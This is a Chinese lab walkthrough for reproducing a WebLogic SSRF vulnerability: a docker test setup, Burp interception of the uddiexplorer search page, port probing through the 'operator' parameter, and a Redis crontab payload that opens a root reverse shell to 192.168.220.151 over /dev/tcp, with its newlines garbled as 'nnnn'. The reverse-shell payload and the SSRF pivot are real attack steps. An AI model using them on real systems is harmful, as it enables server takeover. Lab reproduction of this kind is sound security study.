如何实现Weblogic SSRF漏洞复现

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

访问7001端口如何实现Weblogic SSRF漏洞复现

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

如何实现Weblogic SSRF漏洞复现

2、检查一下IBM这个地方看看

如何实现Weblogic SSRF漏洞复现

发现是个连接,这就可能存在ssrf

3、使用burp suite抓包,点击Search

如何实现Weblogic SSRF漏洞复现

如何实现Weblogic SSRF漏洞复现

4、修改operator参数的连接

如何实现Weblogic SSRF漏洞复现

5、访问结果

访问不存在的端口返回 could not connect over HTTP

如何实现Weblogic SSRF漏洞复现

访问存在的端口返回状态码

如何实现Weblogic SSRF漏洞复现

访问内网

如何实现Weblogic SSRF漏洞复现

利用redis反弹shell的payload

set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1nnnn"config set dir /etc/config set dbfilename crontabsave

看完上述内容,你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

文章标题:如何实现Weblogic SSRF漏洞复现,发布者:亿速云,转载请注明出处:https://worktile.com/kb/p/29260

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
亿速云亿速云认证作者
上一篇 2022年9月24日 上午12:16
下一篇 2022年9月24日 上午12:18

相关推荐

  • 网络安全的基础知识有哪些

    1、什么是链接? 链接是指两个设备之间的连接。它包括用于一个设备能够与另一个设备通信的电缆类型和协议。 2、OSI参考模型的层次是什么? 有7个OSI层:物理层,数据链路层,网络层,传输层,会话层,表示层和应用层。 3、什么是骨干网? 骨干网络是集中的基础设施,旨在将不同的路由和数据分发到各种网络。…

    2022年8月29日
    26400
  • Python如何安装及建立虚拟环境

    一、python安装 python安装以Python3.7.9版本为例,其他版本安装步骤一致。 Python官网 二、建立虚拟环境 win+r,打开dos窗口 查看python是否安装成功 安装virtualenv,安装命令: pip install virtualenv -i https://py…

    2022年9月6日
    32100
  • Js变量or循环中的var和le的介绍

    目录 在for循环中使用var声明初始化带来的问题 解决方法 使用闭包 使用let变量初始化 for循环怎么处理用let和var声明的初始化变量? 总结 在for循环中使用var声明初始化带来的问题 // 一道经典面试题:var funcs = [];for (var i = 0; i < 3…

    2022年9月13日
    14300
  • html中的from标签的作用介绍

    在html中,from标签用于创建供用户输入的HTML表单(表单域),以实现用户信息的收集和传递,form中的所有内容都会被提交给服务器;语法“<form action=”提交地址” method=”提交方式” name=”表单名称&…

    2022年9月16日
    1.1K00
  • MySQL数据库子查询语法规则是什么

    子查询是在查询语句里面再嵌套一个查询,这是因为我们在提取数据的时候有很多不知道的数据产生了依赖关系。此时我们就需要先查询一组数据的结果集,然后将这个结果集作用为下一个查询的对象。在 “表连接的章节”,我们曾说过子查询的效率低下的问题,其实并不是所有的子查询效率都是低下的,“WHERE” 子查询在匹配…

    2022年9月2日
    20800
  • 网络安全审计工具Nmap如何使用

    一.软件下载 https://nmap.org/download.html 二.扫描IP nmap 192.168.1.10 #扫描单IP nmap 192.168.1.10-100 #扫描IP段 nmap 192.168.1.10 192.168.1.11 #扫描单独的多IP nmap 192.1…

    2022年9月2日
    18300
  • 如何分析Haproxy端口复用

    本文作者:Spark(Ms08067内网安全小组成员) 一、概述 Haproxy是一个使用c语言开发的高性能负载均衡代理软件,提供tcp和http的应用程序代理,免费、快速且可靠。类似frp,使用一个配置文件+一个server就可以运行。优点: 大型业务领域应用广泛 支持四层代理(传输层)以及七层代…

    2022年9月10日
    41100
  • MySQL如何解决delete大量数据后空间不释放的问题

    MySQL 的几种碎片整理方案总结(解决delete大量数据后空间不释放的问题) 1.背景知识? 1.1 为什么会有碎片? MySQL 中 insert 与 update 都可能导致页分裂,这样就存在碎片。 对于大量的UPDATE,也会产生文件碎片化 , Innodb的最小物理存储分配单位是页(pa…

    2022年9月16日
    3.7K00
  • windows驱动精灵ahci驱动怎么安装

    驱动精灵ahci驱动: 答:驱动精灵是无法安装ahci驱动的。 在硬盘IDE模式下是无法发现achi驱动的,所以无法安装。 而改成ata模式也会造成蓝屏。 ahci驱动安装方法: 1、按下“win+r”打开运行,输入 regedit。 2、依次打开 HKEY_LOCAL_MAHCINESystemC…

    2022年9月10日
    43100
  • 怎么用Intellij IDEA创建web项目

    Idea创建web项目 1.打开idea,选择file->New->Project 2.点击Java,点击下一步. 3.修改项目名。 4. 右键项目,选择add framework support 5. 完成之后,项目结构变成了这样 6. 接下来,我们在WEB-INF下创建classes…

    2022年8月30日
    46400
站长微信
站长微信
电话联系

400-800-1024

工作日9:30-21:00在线

分享本页
返回顶部